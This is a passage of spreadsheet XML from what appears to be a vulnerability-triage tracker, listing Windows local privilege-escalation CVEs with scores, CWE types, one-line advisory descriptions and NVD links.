t="inlineStr"><is><t>NVD</t></is></c><c r="O890" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P890" s="5" t="inlineStr" /><c r="Q890" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R890" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S890" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69604</t></is></c></row><row r="891"><c r="A891" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B891" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C891" s="5" t="inlineStr"><is><t>CVE-2026-69608</t></is></c><c r="D891" s="5" t="n"><v>7.8</v></c><c r="E891" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F891" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G891" s="5" t="inlineStr" /><c r="H891" s="5" t="n"><v>0.003</v></c><c r="I891" s="5" t="inlineStr" /><c r="J891" s="5" t="inlineStr" /><c r="K891" s="5" t="inlineStr" /><c r="L891" s="5" t="inlineStr" /><c r="M891" s="5" t="inlineStr" /><c r="N891" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O891" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P891" s="5" t="inlineStr" /><c r="Q891" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R891" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Windows Search Component allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S891" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69608</t></is></c></row><row r="892"><c r="A892" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B892" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C892" s="5" t="inlineStr"><is><t>CVE-2026-69612</t></is></c><c r="D892" s="5" t="n"><v>7.8</v></c><c r="E892" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F892" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G892" s="5" t="inlineStr" /><c r="H892" s="5" t="n"><v>0.004</v></c><c r="I892" s="5" t="inlineStr" /><c r="J892" s="5" t="inlineStr" /><c r="K892" s="5" t="inlineStr" /><c r="L892" s="5" t="inlineStr" /><c r="M892" s="5" t="inlineStr" /><c r="N892" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O892" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P892" s="5" t="inlineStr" /><c r="Q892" s="5" t="inlineStr"><is><t>CWE-36</t></is></c><c r="R892" s="5" t="inlineStr"><is><t>Absolute path traversal in Windows Error Reporting allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S892" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69612</t></is></c></row><row r="893"><c r="A893" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B893" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C893" s="5" t="inlineStr"><is><t>CVE-2026-69685</t></is></c><c r="D893" s="5" t="n"><v>7.8</v></c><c r="E893" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F893" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G893" s="5" t="inlineStr" /><c r="H893" s="5" t="n"><v>0.003</v></c><c r="I893" s="5" t="inlineStr" /><c r="J893" s="5" t="inlineStr" /><c r="K893" s="5" t="inlineStr" /><c r="L893" s="5" t="inlineStr" /><c r="M893" s="5" t="inlineStr" /><c r="N893" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O893" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P893" s="5" t="inlineStr" /><c r="Q893" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R893" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S893" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69685</t></is></c></row><row r="894"><c r="A894" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B894" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C894" s="5" t="inlineStr"><is><t>CVE-2026-69687</t></is></c><c r="D894" s="5" t="n"><v>7.8</v></c><c r="E894" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F894" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G894" s="5" t="inlineStr" /><c r="H894" s="5" t="n"><v>0.003</v></c><c r="I894" s="5" t="inlineStr" /><c r="J894" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K89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4" s="5" t="inlineStr" /><c r="M894" s="5" t="inlineStr" /><c r="N894" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O894" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P894" s="5" t="inlineStr" /><c r="Q894" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="R894" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S894" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69687</t></is></c></row><row r="895"><c r="A895" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B895" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C895" s="5" t="inlineStr"><is><t>CVE-2026-69691</t></is></c><c r="D895" s="5" t="n"><v>7.8</v></c><c r="E895" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F895" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G895" s="5" t="inlineStr" /><c r="H895" s="5" t="n"><v>0.003</v></c><c r="I895" s="5" t="inlineStr" /><c r="J895" s="5" t="inlineStr" /><c r="K895" s="5" t="inlineStr" /><c r="L895" s="5" t="inlineStr" /><c r="M895" s="5" t="inlineStr" /><c r="N895" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O895" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P895" s="5" t="inlineStr" /><c r="Q895" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R895" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S895" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69691</t></is></c></row><row r="896"><c r="A896" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B896" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C896" s="5" t="inlineStr"><is><t>CVE-2026-69707</t></is></c><c r="D896" s="5" t="n"><v>7.8</v></c><c r="E896" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F896" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G896" s="5" t="inlineStr" /><c r="H896" s="5" t="n"><v>0.003</v></c><c r="I896" s="5" t="inlineStr" /><c r="J896" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K89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6" s="5" t="inlineStr" /><c r="M896" s="5" t="inlineStr" /><c r="N896" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O896" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P896" s="5" t="inlineStr" /><c r="Q896" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R896" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S896" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69707</t></is></c></row><row r="897"><c r="A897" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B897" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C897" s="5" t="inlineStr"><is><t>CVE-2026-69709</t></is></c><c r="D897" s="5" t="n"><v>7.8</v></c><c r="E897" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F897" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G897" s="5" t="inlineStr" /><c r="H897" s="5" t="n"><v>0.003</v></c><c r="I897" s="5" t="inlineStr" /><c r="J897" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K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897" s="5" t="inlineStr" /><c r="M897" s="5" t="inlineStr" /><c r="N897" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O897" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P897" s="5" t="inlineStr" /><c r="Q897" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R897" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="S897" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69709</t></is></c></row><row r="898"><c r="A898" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B898" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C898" s="5" t="inlineStr"><is><t>CVE-2026-69720</t></is></c><c r="D898" s="5" t="n"><v>7.8</v></c><c r="E898" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F898" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G898" s="5" t="inlineStr" /><c r="H898" s="5" t="n"><v>0.003</v></c><c r="I898" s="5" t="inlineStr" /><c r="J898" s="5" t="inlineStr" /><c r="K898" s="5" t="inlineStr" /><c r="L898" s="5" t="inlineStr" /><c r="M898" s="5" t="inlineStr" /><c r="N898" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O898" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P898" s="5" t="inlineStr" /><c r="Q898" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R898" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows MIDI Service Module allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S898" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69720</t></is></c></row><row r="899"><c r="A899" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B899" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C899" s="5" t="inlineStr"><is><t>CVE-2026-69725</t></is></c><c r="D899" s="5" t="n"><v>7.8</v></c><c r="E899" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F899" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G899" s="5" t="inlineStr" /><c r="H899" s="5" t="n"><v>0.003</v></c><c r="I899" s="5" t="inlineStr" /><c r="J899" s="5" t="inlineStr" /><c r="K899" s="5" t="inlineStr" /><c r="L899" s="5" t="inlineStr" /><c r="M899" s="5" t="inlineStr" /><c r="N899" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O899" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P899" s="5" t="inlineStr" /><c r="Q899" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="R899" s="5" t="inlineStr"><is><t>Double free in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S899" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69725</t></is></c></row><row r="900"><c r="A900" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B900" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C900" s="5" t="inlineStr"><is><t>CVE-2026-69731</t></is></c><c r="D900" s="5" t="n"><v>7.8</v></c><c r="E900" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F900" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G900" s="5" t="inlineStr" /><c r="H900" s="5" t="n"><v>0.003</v></c><c r="I900" s="5" t="inlineStr" /><c r="J900" s="5" t="inlineStr" /><c r="K900" s="5" t="inlineStr" /><c r="L900" s="5" t="inlineStr" /><c r="M900" s="5" t="inlineStr" /><c r="N900" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O900" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P900" s="5" t="inlineStr" /><c r="Q900" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R900" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in HID class driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S900" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69731</t></is></c></row><row r="901"><c r="A901" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B901" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C901" s="5" t="inlineStr"><is><t>CVE-2026-69738</t></is></c><c r="D901" s="5" t="n"><v>7.8</v></c><c r="E901" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F901" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G901" s="5" t="inlineStr" /><c r="H901" s="5" t="n"><v>0.003</v></c><c r="I901" s="5" t="inlineStr" /><c r="J901" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K90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01" s="5" t="inlineStr" /><c r="M901" s="5" t="inlineStr" /><c r="N901" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O901" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P901" s="5" t="inlineStr" /><c r="Q901" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="R901" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S901" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69738</t></is></c></row><row r="902"><c r="A902" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B902" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C902" s="5" t="inlineStr"><is><t>CVE-2026-69758</t></is></c><c r="D902" s="5" t="n"><v>7.8</v></c><c r="E902" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F902" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G902" s="5" t="inlineStr" /><c r="H902" s="5" t="n"><v>0.003</v></c><c r="I902" s="5" t="inlineStr" /><c r="J902" s="5" t="inlineStr" /><c r="K902" s="5" t="inlineStr" /><c r="L902" s="5" t="inlineStr" /><c r="M902" s="5" t="inlineStr" /><c r="N902" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O902" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P902" s="5" t="inlineStr" /><c r="Q902" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R902" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Universal Disk Format File System Driver (UDFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S902" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69758</t></is></c></row><row r="903"><c r="A903" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B903" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C903" s="5" t="inlineStr"><is><t>CVE-2026-69785</t></is></c><c r="D903" s="5" t="n"><v>7.8</v></c><c r="E903" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F903" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G903" s="5" t="inlineStr" /><c r="H903" s="5" t="n"><v>0.003</v></c><c r="I903" s="5" t="inlineStr" /><c r="J903" s="5" t="inlineStr" /><c r="K903" s="5" t="inlineStr" /><c r="L903" s="5" t="inlineStr" /><c r="M903" s="5" t="inlineStr" /><c r="N903" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O903" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P903" s="5" t="inlineStr" /><c r="Q903" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="R903" s="5" t="inlineStr"><is><t>Untrusted search path in Windows Smart Card allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S903" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69785</t></is></c></row><row r="904"><c r="A904" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B904" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C904" s="5" t="inlineStr"><is><t>CVE-2026-69787</t></is></c><c r="D904" s="5" t="n"><v>7.8</v></c><c r="E904" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F904" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G904" s="5" t="inlineStr" /><c r="H904" s="5" t="n"><v>0.003</v></c><c r="I904" s="5" t="inlineStr" /><c r="J904" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K90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04" s="5" t="inlineStr" /><c r="M904" s="5" t="inlineStr" /><c r="N904" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O904" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P904" s="5" t="inlineStr" /><c r="Q904" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R904" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S904" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69787</t></is></c></row><row r="905"><c r="A905" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B905" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C905" s="5" t="inlineStr"><is><t>CVE-2026-69790</t></is></c><c r="D905" s="5" t="n"><v>7.8</v></c><c r="E905" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F905" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G905" s="5" t="inlineStr" /><c r="H905" s="5" t="n"><v>0.003</v></c><c r="I905" s="5" t="inlineStr" /><c r="J905" s="5" t="inlineStr" /><c r="K905" s="5" t="inlineStr" /><c r="L905" s="5" t="inlineStr" /><c r="M905" s="5" t="inlineStr" /><c r="N905" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O905" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P905" s="5" t="inlineStr" /><c r="Q905" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R905" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Credential Providers allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S905" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69790</t></is></c></row><row r="906"><c r="A906" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B906" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C906" s="5" t="inlineStr"><is><t>CVE-2026-69799</t></is></c><c r="D906" s="5" t="n"><v>7.8</v></c><c r="E906" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F906" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G906" s="5" t="inlineStr" /><c r="H906" s="5" t="n"><v>0.002</v></c><c r="I906" s="5" t="inlineStr" /><c r="J906" s="5" t="inlineStr" /><c r="K906" s="5" t="inlineStr" /><c r="L906" s="5" t="inlineStr" /><c r="M906" s="5" t="inlineStr" /><c r="N906" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O906" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P906" s="5" t="inlineStr" /><c r="Q906" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="R906" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S906" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69799</t></is></c></row><row r="907"><c r="A907" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B907" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C907" s="5" t="inlineStr"><is><t>CVE-2026-69801</t></is></c><c r="D907" s="5" t="n"><v>7.8</v></c><c r="E907" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F907" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G907" s="5" t="inlineStr" /><c r="H907" s="5" t="n"><v>0.003</v></c><c r="I907" s="5" t="inlineStr" /><c r="J907" s="5" t="inlineStr" /><c r="K907" s="5" t="inlineStr" /><c r="L907" s="5" t="inlineStr" /><c r="M907" s="5" t="inlineStr" /><c r="N907" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O907" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P907" s="5" t="inlineStr" /><c r="Q907" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R907" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Audio Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S907" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69801</t></is></c></row><row r="908"><c r="A908" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B908" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C908" s="5" t="inlineStr"><is><t>CVE-2026-69821</t></is></c><c r="D908" s="5" t="n"><v>7.8</v></c><c r="E908" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F908" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G908" s="5" t="inlineStr" /><c r="H908" s="5" t="n"><v>0.003</v></c><c r="I908" s="5" t="inlineStr" /><c r="J908" s="5" t="inlineStr" /><c r="K908" s="5" t="inlineStr" /><c r="L908" s="5" t="inlineStr" /><c r="M908" s="5" t="inlineStr" /><c r="N908" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O908" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P908" s="5" t="inlineStr" /><c r="Q908" s="5" t="inlineStr"><is><t>CWE-116</t></is></c><c r="R908" s="5" t="inlineStr"><is><t>Improper encoding or escaping of output in Active Directory Certificate Services (AD CS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S908" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69821</t></is></c></row><row r="909"><c r="A909" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B909" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C909" s="5" t="inlineStr"><is><t>CVE-2026-69822</t></is></c><c r="D909" s="5" t="n"><v>7.8</v></c><c r="E909" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F909" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G909" s="5" t="inlineStr" /><c r="H909" s="5" t="n"><v>0.003</v></c><c r="I909" s="5" t="inlineStr" /><c r="J909" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K909"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909" s="5" t="inlineStr" /><c r="M909" s="5" t="inlineStr" /><c r="N909" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O909" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P909" s="5" t="inlineStr" /><c r="Q909" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="R909" s="5" t="inlineStr"><is><t>Numeric truncation error in Windows Kerberos allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S909" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69822</t></is></c></row><row r="910"><c r="A910" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B910" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C910" s="5" t="inlineStr"><is><t>CVE-2026-69841</t></is></c><c r="D910" s="5" t="n"><v>7.8</v></c><c r="E910" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F910" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G910" s="5" t="inlineStr" /><c r="H910" s="5" t="n"><v>0.003</v></c><c r="I910" s="5" t="inlineStr" /><c r="J910" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K91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0" s="5" t="inlineStr" /><c r="M910" s="5" t="inlineStr" /><c r="N910" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O910" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P910" s="5" t="inlineStr" /><c r="Q910" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R910" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Encrypting File System (EFS) allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S910" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69841</t></is></c></row><row r="911"><c r="A911" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B911" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C911" s="5" t="inlineStr"><is><t>CVE-2026-69844</t></is></c><c r="D911" s="5" t="n"><v>7.8</v></c><c r="E911" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F911" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G911" s="5" t="inlineStr" /><c r="H911" s="5" t="n"><v>0.003</v></c><c r="I911" s="5" t="inlineStr" /><c r="J911" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K91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1" s="5" t="inlineStr" /><c r="M911" s="5" t="inlineStr" /><c r="N911" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O911" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P911" s="5" t="inlineStr" /><c r="Q911" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R911" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Win32K allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S911" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69844</t></is></c></row><row r="912"><c r="A912" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B912" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C912" s="5" t="inlineStr"><is><t>CVE-2026-69864</t></is></c><c r="D912" s="5" t="n"><v>7.8</v></c><c r="E912" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F912" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G912" s="5" t="inlineStr" /><c r="H912" s="5" t="n"><v>0.002</v></c><c r="I912" s="5" t="inlineStr" /><c r="J912" s="5" t="inlineStr" /><c r="K912" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L912" s="5" t="inlineStr" /><c r="M912" s="5" t="inlineStr" /><c r="N912" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O912" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P912" s="5" t="inlineStr" /><c r="Q912" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R912" s="5" t="inlineStr"><is><t>Use after free in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S912" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69864</t></is></c></row><row r="913"><c r="A913" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B913" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C913" s="5" t="inlineStr"><is><t>CVE-2026-69900</t></is></c><c r="D913" s="5" t="n"><v>7.8</v></c><c r="E913" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F913" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G913" s="5" t="inlineStr" /><c r="H913" s="5" t="n"><v>0.003</v></c><c r="I913" s="5" t="inlineStr" /><c r="J913" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K913" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L913" s="5" t="inlineStr" /><c r="M913" s="5" t="inlineStr" /><c r="N913" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O913" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P913" s="5" t="inlineStr" /><c r="Q913" s="5" t="inlineStr"><is><t>CWE-822</t></is></c><c r="R913" s="5" t="inlineStr"><is><t>Untrusted pointer dereference in Kernel Streaming WOW Thunk Service Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S913" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69900</t></is></c></row><row r="914"><c r="A914" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B914" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C914" s="5" t="inlineStr"><is><t>CVE-2026-69907</t></is></c><c r="D914" s="5" t="n"><v>7.8</v></c><c r="E914" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F914" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G914" s="5" t="inlineStr" /><c r="H914" s="5" t="n"><v>0.003</v></c><c r="I914" s="5" t="inlineStr" /><c r="J914" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K9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14" s="5" t="inlineStr" /><c r="M914" s="5" t="inlineStr" /><c r="N914" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O914" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P914" s="5" t="inlineStr" /><c r="Q914" 